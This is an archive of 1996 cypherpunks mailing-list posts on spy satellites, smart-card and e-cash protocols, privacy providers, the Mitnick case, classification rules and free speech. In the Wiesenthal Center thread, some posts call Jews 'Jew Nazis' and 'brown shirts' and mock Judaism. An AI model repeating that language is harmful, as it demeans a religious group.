             sance balloons to drift across the Soviet Union...." 
 
             "...the U-2 high-altitude spyplane took to the skies." 
             It made "24 flights...between 1956 and 1960." 
 
      1958   "In early 1958, the National Security Council gave the 
             development of photo reconnaisance satellites its high- 
             est priority, and the Corona program was born." 
 
      1959   Specifically mentioned is "a failed mission in 1959." 
             Generally mentioned  is "the failure of the first dozen 
             missions...." 
 
      1960   "In 1960, Corona was placed under the...National Recon- 
             naisance Office." 
 
             "...on May 1, 1960...[U-2] pilot...Powers was shot down 
             ...." 
 
             "Eisenhower promised that the United States would cease 
             all manned [!] overflights of Soviet territory." 
 
             "Just 110 days after the Powers incident, the 14th Cor- 
             ona flight produced photos of...the Soviet Union...." 
 
             "In mid-August 1960, President...Eisenhower held a press 
             conference to announce the successful recovery of an 
             American flag that had flown into orbit aboard Discover- 
             er XIII. 
 
             Proudly displaying the flag, Eisenhower told reporters 
             that the Discoverer launch was part of a scientific re- 
             search effort to explore environmental conditions in 
             space.  But he was lying." 
 
     1962    "Zenit, the first succesful Soviet spysat, was launched 
             in April 1962...." 
 
     1972    "Of 145 flights conducted before the [Corona] program's 
             conclusion in 1972,...102 [were] deemed successful...." 
 
 
  In 1960, Statesman Eisenhower weazel-worded.  Also in 1960 Scientist 
  Eisenhower lied. 
 
 
                        BIKEL:    Impossible! 
 
                        HEPBURN:  Nevertheless. 
  
 
                           --African Queen 

 
  Cordially, 
 
  Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: luxana <pati@ipied.tu.ac.th>
Date: Thu, 11 Jan 1996 03:31:39 +0800
To: cypherpunks@toad.com
Subject: KC/KI encryption on smart cards
In-Reply-To: <199601080931.BAA16945@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.960110184715.4775C-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


	I've seen semantics of the KC/KI encryption system used on smart
cards for the local PCN cellular system.  Does anybody know whether this
is secure, and where to get more info on it?  The smart card seems to
generate keys by itself that are used by the cellular phone to encrypt its
calls.  Could this be applied as a universal smart card crypto system?

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 11 Jan 1996 11:46:11 +0800
To: cypherpunks@toad.com
Subject: A Mondex like Protocol (2)
Message-ID: <ad1a2486000210045d1d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


An improved Mondex like protocol

About a week ago I posted a protocol that meets the requirements of the
Mondex cards as I understand them. It was overkill. I wasn't clear in my
own mind what properties of Diffie Hellman I was depending on. Here is an
improvement that does not use DH and thus uses less compute power.

Two Mondex units, upon command of their respective operators, can pass
money from one to the other via infrared signals. I think that this
requires tamper proof units.

I understand that the Mondex protocol is currently undisclosed. I have no
information about that protocol but am merely trying to find a protocol
that fits the little that I know about Mondex. Are there other guesses?

When a receiving unit, the payee, is instructed by its operator to be ready
to receive a payment, it increments an internal counter. The payee
transmits an infrared message including its unique id, the counter value
and a simple checksum. This message is repeated until some timeout or a
valid transmission from a payer is received.

The payer unit, having been instructed by its operator to pay, awaits such
a message. Upon receipt it decrements its local balance and constructs a
record consisting of the payee's id, the payee's counter value, the payment
amount and a secret shared by all money units. The payer then transmits a
message with the payment amount, and the secure hash of the record. This
transmission is repeated until an acknowledgment or a timeout.

Upon receipt the payee is able to reconstruct the payer's record and
compute the secure hash. If the computed hash matches the received hash
then the payee can be sure that some legitimate payer unit has decremented
its local balance and it is thus valid for the payee to increment its value
by that amount. It then transmits one acknowledgment.

If the receiver's transmission is garbled but the checksum does not catch
it then the transmitted money is lost. The payer thinks it has authorized a
balance increment but no unit recognizes the authorization as its own.

Garbled transmission from a payer are ignored when the hash check fails.
Subsequent transmissions will hopefully succeed.

Note that this scheme uses no crypto.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 11 Jan 1996 09:16:35 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: When they came for the Jews...
Message-ID: <199601110051.TAA10090@homeport.org>
MIME-Version: 1.0
Content-Type: text


Sten Drescher wrote:
Adam Shostack <adam@lighthouse.homeport.org> said:


AS> As always, the best answer to bad speech is more speech.  Ken McVay,
AS> and his Nizkor project, (http://nizkor.almanac.bc.ca) have been
AS> involved in fighting hate speech, holocaust revisionism, and the
AS> like for long time through archiving the big lies that revisionists
AS> pump out, documenting the bogosity of their footnotes, showing their
AS> contradictions, etc.  Pointing out this, and other net resources
AS> fighting anti-semitism is a much cleaner approach than attacking the
AS> Wiesenthal center.

Isn't this attacking, or at least opposing, them directly?

	Nope; its changing the terms of the debate.  Saying 'you can't
make this happen' is attacking them.  

AS> Someone noted the police stopping skinheads in Oregon-- I'll point
AS> out that there is a substantial difference between talking and
AS> randomly beating the crap out of people.  The later is a fair basis
AS> for action by police, although we may choose to question their
AS> methodology.  There is also a difference between stopping skinheads
AS> and stopping blacks, in that the skinheads decided to wear clothing
AS> and tattoos that identify them as skinheads, and thus may more
AS> fairly be asked to bear the consequences.

=09This is known as the "[S]he asked for it" argument, a widely
discredited defense.  If their _behavior_ doesn't indicate criminal
behavior, and there isn't a report of a crime with suspects meeting
their descriptions, there is no more excuse for hassling them than there
is for hassling blacks, or hispanics, or....  Who knows, they could
actually be a bunch of Marines (depending on the area).

	No, this is not 'she asked for it.'

	If there are skinheads who fit the description 'bald, black
leather, swastikas' attacking people, then stopping people who fit
that description is ok by me, as opposed to stopping people who fit
the description 'black, medium hight, living in Boston,' which were
the criterion here a few years back after Chuck Stewart shot his wife.

	The lead-in was people being attacked on the street at random.
I thought I had hypothosized that they were skinheads.

	The crypto relevance might be getting thin.  I think this will
end my contribution to this thread in public.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Fri, 12 Jan 1996 11:05:36 +0800
To: cypherpunks@toad.com
Subject: C2 and the Worst Case
Message-ID: <2.2.32.19960111040212.006a69dc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

First off, this is _not_ a criticism - c2.org provides wonderful services,
and I'm budgeting to buy more from them.

However, I'm curious. Consider a reasonably worst case, in which ye
jack-booted thugges come through the door unannounced, scoop up everything,
and haul it off for examination.

The question is, how much would they get? How much information about c2
users would fall into the wrong hands?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMPSLo33AXR8sjiylAQEHOgfPQyULO5Ni/4VCZPo8PNLbURy7bgkMG7aw
UWeorZr95e8kFA3JA6VxCpmgRmStpeX78ZcN9a35Z0lguRF5+VNddzQYv/ydZxtg
u5HP2stit9PG8fyP0SEGrxEVpnbwchOxtUxhuxJ7CZsZfMGWKi6EtXrQ5LhNGSCZ
isoShwOXse5/XLHY3JzcrjbSa6PDHxmpwhYbkk8tyi8jQWFDDc+HbncgaC4FZL4V
2tntjx3HPe9Hy92v24K59UnzIpudVqF8f1jX6Z+m7lLzStARkNZwliRjL6pIz8G7
fz2uSXrgbAMVIkK6g9DOP3A48prob7LFnPZmEw4J6gF4fA==
=+ZDY
-----END PGP SIGNATURE-----

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 11 Jan 1996 09:33:02 +0800
To: cypherpunks@toad.com
Subject: Re: David Kahn on C-Span 2
Message-ID: <199601110121.UAA13773@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The occasion was a "Cryptologic History Symposium," held on 
October 26, 1995, at NSA.
No time was given for rebroadcast.


Kahn spoke briefly on material covered in his book on 
codebreaking before and during WW2.


The second speaker was Professor Colin Burke, Univ. of 
Maryland, like Kahn a scholar-in-residence at NSA, who reviewed 
the pre-war and WW2 machines and proto-computers for 
cryptanalysis.


Kahn, a charming speaker, said about Russian cryptanalysis 
ability during WW2, that while there has been no published 
material on the period, three talents make for excellent 
cryptology: chess, music and mathematics, all of which the 
Russians excell at.

---

Other codebreaking news: the English are making a TV-movie on 
Alan Turing, due to be broadcast around Easter. It is based on 
the successful theater play a while back.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andypr@ix.netcom.com (Andrew Purshottam )
Date: Thu, 11 Jan 1996 14:22:10 +0800
To: cypherpunks@toad.com
Subject: Saw the Tsutomu and John show... (Mitnick haters skip this)
Message-ID: <199601110559.VAA14202@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Saw the Stanford seimnar given by Tsutomu Shimomura and John Markoff,
on the subject of Tsutomu's pursuit of Kevin Mitnick. While not a 
technical seminar on the vulnerablities of TCP and system services,
the talk was quite interesting and I recommend it to you, if they bring
it to a campus or bookstore near you.

Markoff began with brief bio of Mitnick, with stories of the
legendary 8BBS in the late 70's, and how Mitnick started his 
"career" as a phone phreak, exploting his understanding of social
processes inside companies (whom to spy on or dupe to get
confidential information.) Tsutomu played a hilarious and
vile sounding taunt left on his answering machine after a breakin
(presumably Mitnick, but never stated, perhaps for legal reasons).
Markoff's presentation was interesting, but pretty much old hat for
people who read his stories or the Mitnick chapter of the 
Hafner/Markoff text _Cyberpunk_. Markoff did mention that Mitnick was
_Anton Chernoff_ on 8BBS, something I do not recall in Markoff's 
previous writings. 

Then Tsutsomu described how he got involved in the case, after a friend 
of his asked for help. He illustrated his tracking of Mitnick with 
logfiles and realtime-captured vt100 transcripts of Mitnick's
breakin attempts and talk sessions with associates. These were quite 
hilarious, as Mitnick apparently took his breakins very personally, and
planned various nasty pranks to play on Tsutsomu and Markoff. (Note to 
TS, please equip your VT100 playback with bigger fonts or get a 
magnifier program for your laptop, as is used by the visually impaired,
as it was very hard to read the material, especially the obscenities
and vulgar personal remarks you did not dignify with reading ;-)

I particularly liked the low key and realistic image of Mitnick; 
neither evil genius  nor master technician (TS speculates that Mitnick 
could not have written his Morris/Bellovin IP ISN spoofer or other 
tools, but rather had a standard collection of breakins that he 
mechanically applied to the companies whose data his desired) Mitnick's 
main skills were his understanding of how tech companies work, and his 
updating of the phone-phreak "social engineering" techniques, applied 
to software developers instead of telco people. They also managed to 
convey how throughly unpleasant and mean-spirited Mitnick is (contrast 
with the poor oppressed boy picture given by Bloombecker's text).

Tsutomu mentioned that much source material for the investigation,
including a Java version of the vt100 transcript player with
many Mitnick intercepts, will be available from www.takedown.com
(which does not appear to be up yet.) The cite is

Takedown, Tsutomu Shimomura with John Markoff, Hyperion 1996. 
ISBN 0-7868-6210-6.

Cheers, Andy (andy@acgeas.com)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 11 Jan 1996 18:20:22 +0800
To: cypherpunks@toad.com
Subject: Shimomura on TV?
Message-ID: <199601110308.WAA26826@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone just said that NBC's Dateline showed a snippet of 
Shimomura on an upcoming show about rampant cyber-crime and 
that he was the best hope against it, or something to that 
effect. Did anyone see it and get the time and date?


Anyone attend the Shimomura-Markoff lecture at Stanford today?


Is this the media blitz for their pot-boiler? Can't wait to 
slurp it.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Fri, 12 Jan 1996 03:53:53 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Popular Science on US Spysats - Part 1
Message-ID: <v01530508ad1a5b3f4b73@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>  Friend,
>
>
>  02 96 Popular Science runs a cover story, America's First Eyes
>  in Space.  It's by Stuart Brown.  It's about "a secret space
>  reconnaisance program known as Corona."

Yawn.

Didn't I ask you to stop posting garbage to the list? Please do not grace
us with parts 2, 3 or whatever.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tjava.com (Anonymous)
Date: Fri, 12 Jan 1996 18:23:07 +0800
To: cypherpunks@toad.com
Subject: Cryptology and classification
Message-ID: <199601110430.WAA26205@tjava.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

Just received a memo, the "Desk Reference Guide" to Executive Order 12958.
This memo/executive order discusses classified national security
information.  The cypherpunks-interesting aspect of this memo lies in
exceptions to some new guidelines.  Basically, this executive order
removes the authority for the government to "permanently" classify
information.  Basically, classification is now limited to 10 years
(or 25 years in some special cases).  The exceptions to this allow
classification for longer durations for certain types of material.
These types include things like protecting intelligence sources and 
nuclear weapons design info.  One of the other exeptions is for:

"...information that would impair United States cryptologic systems
or activities."

This appears to be taken directly from the executive order, so these
types of decisions are being made at high levels.  Thought you might
be interested.

	Hooker





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 11 Jan 1996 15:02:35 +0800
To: cypherpunks@toad.com
Subject: RE: Net Control is Thought Control
Message-ID: <ad19ef540c02100424bf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:41 PM 1/10/96, David Mandl wrote:

>P.S.: Regarding limits on "freedom of speech" in the U.S., take a look
>at the long list Tim May posted a few months back.  (I was scoffing at
>Perry's claim that we had nearly complete freedom of speech in the
>U.S., and then Tim responded with much more detail.)

This may have been more than a "few" months back...maybe even more than
several. I'm not sure when I wrote this, and I have too many megs of past
messages to find it.

The gist (without examples right now) is that the U.S. has a truly stunning
amount of regulation of speech. Between regulation of professions,
restrictions on product claims, the whole mess of tort law, and the various
anti-discrimination and fairness laws, the only speech which is truly free
is that of penniless idiots spouting off in public parks.

The U.S. has few restrictions on speech in the form of prior restraint
(that is, words do not have to be cleared by censors or approval boards,
mostly), but a welter of post-speech sanctions.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 12 Jan 1996 03:54:51 +0800
To: cypherpunks@toad.com
Subject: Good Riddance to Wiesenthal and His Nazis
Message-ID: <ad19f1340d02100495a6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:26 PM 1/10/96, Adam Shostack wrote:
>        The Wiesenthal center is very influential in Jewish circles.
>Attacking them directly would probably be a bad idea, and create bad
>associations for anonymity amongst Jews.  (I'll come back to this.)

I for one won't hesitate to criticize these Jew Nazis.

Who cares if it "creates bad associations for anonymity amongst Jews"? If a
Jew is put off by condemnation of the Wiesenthalistas and their pogrom
against free speech, I say good riddance.

Didn't those Jews learn anything? It wasn't "free speech" in pre-war
Germany that led to the extermination of Jews, it was the rise to power (by
a combination of circumstances involving a putsch, the Reichstag fire, a
feeble ruler, hunger for strong leadership, dire economic conditions, and
other factors) by Hitler and the placing of too much power in the hands of
a central government.

>methodology.  There is also a difference between stopping skinheads
>and stopping blacks, in that the skinheads decided to wear clothing
>and tattoos that identify them as skinheads, and thus may more fairly
>be asked to bear the consequences.

So, wearing the wrong clothes because the clothes identify one as a member
of a political group is grounds for being stopped by the police? "Asked to
bear the consequences"?

Since when?

--Tim May

(In case anyone is in doubt, I have no beef (or pork) with Jews. I think
their religion is just another quaint Middle Eastern idol-worshiping cult,
on a par with Islam and Christianity and Zoroastrianism. But I have been
following the attempts by such Nazi Jews as the Simon Wiesenthal chapter
Jews in L.A. to censor the Net--their first calls went out at least two
years ago--and this latest sending of 200+ "advisory letters" to ISPs, if
confirmed, will be their undoing. The Thule Network is already using
Cypherpunks-type remailers, and this will only gain them more members.)


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Thu, 11 Jan 1996 15:27:58 +0800
To: Steven Weller <stevenw@best.com>
Subject: Re: Popular Science on US Spysats - Part 1
In-Reply-To: <v01530508ad1a5b3f4b73@[206.86.1.35]>
Message-ID: <Pine.OSF.3.91.960111010606.32583E-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 10 Jan 1996, Steven Weller wrote:

> >  Friend,
> >
> >
> >  02 96 Popular Science runs a cover story, America's First Eyes
> >  in Space.  It's by Stuart Brown.  It's about "a secret space
> >  reconnaisance program known as Corona."
> 
> Yawn.
> 
> Didn't I ask you to stop posting garbage to the list? Please do not grace
> us with parts 2, 3 or whatever.
> 

Did I miss something? Your request or what? 

Yes, I know the future flames (Please, put them to email), but it seems 
we have a new moderator for the list.

Dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 11 Jan 1996 17:21:57 +0800
To: frissell@panix.com
Subject: Re: When they came for the Jews...
Message-ID: <01HZVCRZLG80A0UE92@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	In regards to all this, I thought that people might be interested in
knowing about an interview on Fresh Aire, a radio program I heard via WNYC. The
individual being interviewed was the American Jewish Committee's person on
Hate Groups, Kenneth Stern. He was being interviewed due to a book he'd written
before the Oklahoma City bombing, in which he (mis-)called all militia groups
hate groups.
	In the interview, he was asked about the Simon Weisenthal Center's
letter in regards to the Internet. He spoke in opposition to it, and mentioned
later that he tends to advise people that the best solution for hate speech is
speech against it- a definitely good message.
	He mentioned the Internet as being a popular place for militia and
similar groups to form. The two reasons he gave were that it was an easy means
to spread information, and that the information was hard to verify (the
urban/computer legend phenomenon, helping give rise to the various conspiracy
theories circulating on the Net). He also mentioned that "hate" groups,
including militias are using encryption, but didn't say anything further.
	Unfortunately, he also had some problems, which I'll go into here
because of the analogies between guns and cryptography. While having respect
for the First Amendment's protections of speech and press, and (to some degree)
even the Second Amendment's protections of the right to keep & bear arms, he
forgot completely about freedom of association- he called for a federal law
making it a felony to have "private armies." There are some such laws on the
books on various states, but they are (fortunately) not enforced, and thus
have not yet been constitutionally challenged.
	The second group of his problems were in defining all militia groups as
"hate" groups. His basic analysis for this was threefold:
	A. They have members in common with some definite hate groups, such as
the Aryan Nations.
	B. Some militias have made racist, etcetera statements that qualify
them as hate groups.
	C. They hate somebody, namely the federal government.
	The first argument falls apart once one points out that this is a
classic conspiracy theorist untrue argument- one can use it to argue that the
Trilateral Commission runs the US government, for instance.
	The second argument is obviously false. It's a variety of stereotyping,
something that I would have thought he'd be more sensitive to.
	The third argument would classify the Simon Weisenthal Center as a
hate group... he might actually have the guts to do this, since he also named
the Nation of Islam as a hate group (due to their antisemitism, though, not
due to their anti-white racism).
	All in all, though, he gave a much better impression for his group than
I've gathered for the Simon Weisenthal Center. IIRC, the latter was essentially
put together to pursue Nazis, as opposed to Neo-Nazis. My guess is that they're
feeling useless and wanting to pursue somebody- sort of like the Secret Service
and Steve Jackson Games.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Thu, 11 Jan 1996 11:44:20 +0800
To: cypherpunks@toad.com
Subject: Re: SSH for Windows
In-Reply-To: <199601101153.MAA20011@utopia.hacktic.nl>
Message-ID: <199601110325.EAA25254@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Alex de Joode (usura@utopia.hacktic.nl) wrote:
> : ...can be found at URL http://public.srce.hr/~cigaly/ssh/.  FYI.
>
> also on ftp.hacktic.nl/pub/replay/pub/incoming/ssh-1-2.zip
>
> (the .hr link is _very_ slow)
>  -AJ-

*ahem* Where's the source code?  You don't expect us to trust a crypto
implementation without source code, do you?

Not to mention that that would be a violation of the GPL...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 11 Jan 1996 19:14:15 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199601111103.GAA14697@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMPTubCoZzwIn1bdtAQHDwQF+JX+aO6VsLP2lruyhHnybD44hSb/JLzU1
fTa36XwrRQoowAt1Hdw3NyqHB59BNxKm
=b5TF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Thu, 11 Jan 1996 19:18:16 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: When they came for the Jews...
In-Reply-To: <199601102152.QAA24188@thor.cs.umass.edu>
Message-ID: <Pine.3.89.9601110648.A23705-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


A city in Illinois (I forget the name at the moment) enacted a law 
against clothing color combinations favored by gangs. Ironically the 
local high school colors were included on the list. Things can get real 
scarey real fast. 

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key

On Wed, 10 Jan 1996, Futplex wrote:
> Sorry, but from where I stand there's nothing "wrong" with wearing clothing,
> bearing tattoos, etc., any more than there's anything "wrong" with having a
> particular level of skin pigmentation. When you decide that only clothing,
> tattoos, etc. that display particular colors, emblems, words, etc. are
> "wrong", then you are stifling free expression. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Fri, 12 Jan 1996 00:00:43 +0800
To: "'vznuri@netcom.com>
Subject: RE: Net Control is Thought Control
Message-ID: <01BADFF7.0DBE4740@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Vladimir Z. Nuri

the problem that "covert thought control" becomes more possible with
an information age that does not handle identity in any "permanent" or
"enduring" way. agent provocateurs etc. may be more difficult to identify
and easier to create and maintain.   in fact a single "government
thought control agent" might be able to create and maintain dozens of
convincing identities, all of them working to subtly manipulate the
population's thinking without detection. (...)
...........................................................................................................

I read the book, too, Nuri, and I think you overlooked an important point.  It doesn't matter about the identity of the provocateur.  It is the identity of the "target" which is crucial.  It is when the prisoner in a psychologically restricted setting begins to identify with their agent-provocateur cell mates, to sympathize with and accept their ideology, that change in that prisoner's mind becomes possible and the thought control is achieved.

This change in the prisoner's image of themselves is not so easily accomplished in a setting where they are free to leave, free to seek and hear other points of view - more importantly, the actual truth.

	"The primary effect of unfreezing is that it makes the prisoner seek information
	which will guide him in finding an adaptational solution to his problems.  Such
	information can be gotten to some extent from the propaganda input to him
	via the mass media, lectures, loudspeakers, etc., but more likely is obtained
	from cell mates or interrogators who begin to be models of how to adapt
	successfully.  The prisoner who has been unfrozen begins to treat the inter-
	personal cues he obtains from them as credible and valid, and begins to 
	take their point of view seriously, where previously he may have paid no
	attention to it or even discounted it. " 

A mistake people make even when they are not physically imprisoned, is that they seek to benefit by association:  they will accept an appearance of confidence as equivalent to knowledge, accepting the word of those who "seem to know", instead of searching for definite facts.  They come to depend upon their identification with groups of such like-minded people, and thus get themselves in trouble when the whole herd is suddenly corralled and taken for a ride (by their leaders).

Rather than worry so much about anyone's actual identity as a determining factor in what one will accept from them, I think it is much more critical to consider the content of the information they offer; to develop one's judgement (to "know how to know")so to be able to evaluate that information and make realistic decisions for one'self about what to support or what actions to take.

    ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 12 Jan 1996 17:59:34 +0800
To: bruceab@teleport.com (Bruce Baugh)
Subject: Re: C2 and the Worst Case
In-Reply-To: <2.2.32.19960111040212.006a69dc@mail.teleport.com>
Message-ID: <199601111704.JAA12833@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The question is, how much would they get? How much information about c2
> users would fall into the wrong hands?

	The only information we have is the information you give
us. If you don't give us your name, we don't have your name. If you
don't give us the site you're coming from, we don't have the sit eyour
coming from. They can't get information out of us that we don't
have. That's our guiding principle, in terms of the privacy against
government-level attack.

> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQEPAwUBMPSLo33AXR8sjiylAQEHOgfPQyULO5Ni/4VCZPo8PNLbURy7bgkMG7aw
> UWeorZr95e8kFA3JA6VxCpmgRmStpeX78ZcN9a35Z0lguRF5+VNddzQYv/ydZxtg
> u5HP2stit9PG8fyP0SEGrxEVpnbwchOxtUxhuxJ7CZsZfMGWKi6EtXrQ5LhNGSCZ
> isoShwOXse5/XLHY3JzcrjbSa6PDHxmpwhYbkk8tyi8jQWFDDc+HbncgaC4FZL4V
> 2tntjx3HPe9Hy92v24K59UnzIpudVqF8f1jX6Z+m7lLzStARkNZwliRjL6pIz8G7
> fz2uSXrgbAMVIkK6g9DOP3A48prob7LFnPZmEw4J6gF4fA==
> =+ZDY
> -----END PGP SIGNATURE-----
> 
> Bruce Baugh
> bruceab@teleport.com
> http://www.teleport.com/~bruceab
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 11 Jan 1996 17:13:47 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: When they came for the Jews...
In-Reply-To: <199601102152.QAA24188@thor.cs.umass.edu>
Message-ID: <Pine.BSD.3.91.960111085313.14370J@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jan 1996, Futplex wrote:

> Adam Shostack writes:
> > There is also a difference between stopping skinheads
> > and stopping blacks, in that the skinheads decided to wear clothing
> > and tattoos that identify them as skinheads, and thus may more fairly
> > be asked to bear the consequences.
> 
> Sorry, but from where I stand there's nothing "wrong" with wearing clothing,
> bearing tattoos, etc., any more than there's anything "wrong" with having a
> particular level of skin pigmentation. When you decide that only clothing,
> tattoos, etc. that display particular colors, emblems, words, etc. are
> "wrong", then you are stifling free expression. 
> 
	guess I dare not to go to Portland....

	age 55, no grey hairs on a full head to past my shoulder blades,
    full reddish brown beard with some white in it past my neck (what 
    there is of it <g>), 300 lb gorilla with tattoo of the "Ace of
    Swords" on left arm, dressed in all black whether t-shirt/jeans
    or hand-tailored suit, and black leather flat rim "assassin's" 
    hat...  often seen arriving on a big bore outlaw chopper. 
    Considered armed and dangerous....

	oh, I almost forgot: with an attitude....


> 
> Futplex <futplex@pseudonym.com>
> "Freedom...oh freedom...that's just some people talking" -Eagles
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 12 Jan 1996 14:29:11 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: When they came for the Jews...
In-Reply-To: <01HZVCRZLG80A0UE92@mbcl.rutgers.edu>
Message-ID: <Pine.SV4.3.91.960111091834.18314A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The Weisenthal brown shirts aren't *feeling* useless. They are scared 
shitless that they might have to go out and get a real job.

Do-gooder organizations are in the same bind as breakfast cereals. It's so
easy to enter the game that there's cut-throat competition. You've got to
keep your name in front of the public, or else people will relegate you to
the Flat-Earth Society status you actually deserve. So, you've got to hire
skilled flacks who know how to position a press release on a slow news
day. Imagine if the Simeonistas' press release hit the fax machines on the
same day that the blizzard shut down the East - it would have gotten lost. 

There's an association of Association Executives. You should see their 
training programs.

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mario Enrique Sanchez" <14740@ef.pc.maricopa.edu>
Date: Fri, 12 Jan 1996 18:19:03 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9601111632.AA10238@PCEF.pc.maricopa.edu>
MIME-Version: 1.0
Content-Type: text/plain


Can i be subscribed to the list?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Thu, 11 Jan 1996 23:06:13 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: Net Control is Thought Control
In-Reply-To: <ad19ef540c02100424bf@[205.199.118.202]>
